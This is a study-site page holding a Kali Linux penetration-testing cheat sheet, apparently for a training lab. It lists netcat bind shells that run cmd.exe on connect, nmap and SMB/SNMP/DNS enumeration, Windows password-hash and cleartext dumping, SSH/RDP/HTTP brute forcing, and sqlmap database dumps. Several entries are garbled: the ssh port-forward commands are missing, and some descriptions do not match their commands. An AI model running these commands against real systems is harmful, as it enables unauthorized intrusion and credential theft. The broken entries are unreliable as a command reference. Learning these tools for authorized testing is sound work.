

Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
Kali commands list including basic command, netcat/ncat, NMAP, SMB and SNMP enumeration and many more.
Typology: Cheat Sheet
1 / 2
This page cannot be seen from the preview
Don't miss anything!


nc – nv target – p port Connect to specific port of the target machine
nc – nlvp port – e filename Listen in specific port and execute the program after connect
ncat --exec cmd.exe --allow 10.0.0.4 - vnl 4444 --ssl
Listen in port 4444, allow only 10.0.0.4 to connect, execute cmd.exe after connect, encrypt with SSL
ncat - v 10.0.0.22 4444 --ssl Connect to target at port 4444, encrypt with SSL
nmap – v – sS – A – T4 target Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap - v - sS - p–A - T4 target As above but scans all TCP ports (takes a lot longer)
nmap - v - sU - sS - p- - A - T4 target As above but scans all TCP ports and UDP scan (takes even longer)
nmap - v - p 445 – script=smb-check-vulns
Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover
ls /usr/share/nmap/scripts/* | grep ftp Search nmap scripts for keywords
nbtscan 192.168.1.0/24 Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux - a target-ip Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing
grep “substring” target-file Extract the lines contains “substring”
grep – o “regex” target-file Same as above with regular expression as input
cut - d "/" - f 3 Split the string by “/” and output the third column
sort – u Remove duplicate
host “hostname” Return the IP address of the host name
wc – l access.log Count the number of line in “access.log”
uniq - c Add the number of occurrence in front
cat access.log | cut - d " " - f 1 | sort | uniq
count the number of occurrence and sort it reversely
by A. Wong
mount 192.168.1.1:/vol/share /mnt/nfs Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs
Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \win-server\share password /user:domain\janedoe /savecred /p:no
Mount a Windows share on Windows from the command line
snmpcheck -t 192.168.1.X -c public SNMP enumeration
snmpwalk -c public -v1 192.168.1.X 1| grep hrSWRunName|cut -d* * -f
SNMP enumeration
snmpenum -t 192.168.1.X SNMP enumeration
onesixtyone -c names -i hosts SNMP enumeration
dnsrecon -d megacorpone.com -t axfr Enum and attemp to transfer target domain
dnsenum zonetransfer.me Enum and attemp to transfer target domain
nikto -h 192.168.1.1 Perform a nikto scan against target
dirbuster Configure via GUI, CLI input doesn’t work most of the time
tcpdump tcp port 80 – w output.pcap i eth
tcpdump for port 80 on interface eth0, outputs to output.pcap
Wireshark GUI tools that perform packet inspection
/usr/share/wordlists/ Kali password list
crunch 6 6 0123456789ABCDEF - o crunch1.txt
Generate password list with only 0-9, A-F character, length = 6, output to crunch1.txt
crunch 4 4 - f /usr/share/crunch/charset.lst mixalpha
Generate password list with specific character set, length = 4
cewl www.megacorpone.com - m 6 - w megacorp-cewl.txt
Generate password list from megacorpone website and output to megacorp-cewl.txt
nano /etc/john/john.conf john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
Mutate password according to the rules
fgdump.exe Dump windows password hash
wce - w Dump the windows clear text password
medusa - h 10.11.1.219 - u admin - P password-file.txt - M http - m DIR:/admin - T 10
HTTP Bruteforce
ncrack - vv --user offsec - P password- file.txt rdp://10.11.1.
RDP Bruteforce
hydra - P password-file.txt - v 10.11.1. snmp
SNMP Bruteforce
hydra - l root - P password-file.txt 10.11.1.219 ssh
SSH Bruteforce
ssh
Local port forward. 127.0.0.1:
ssh
Remote port forward. Access 127.0.0.1:
ssh - D
Dynamic port forward. We created a SOCK proxy at local machine now.
sqlmap - u http://meh.com – forms – batch
Automated sqlmap scan
sqlmap - u TARGET - p PARAM – data=POSTDATA – cookie=COOKIE
Targeted sqlmap scan
sqlmap - u “http://meh.com/meh.php?id=1”
Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap - o - u “http://meh.com/form/” – forms
sqlmap check form for injection
sqlmap - o - u “http://meh/vuln-form” – forms
sqlmap dump and crack hashes for table users on database-name.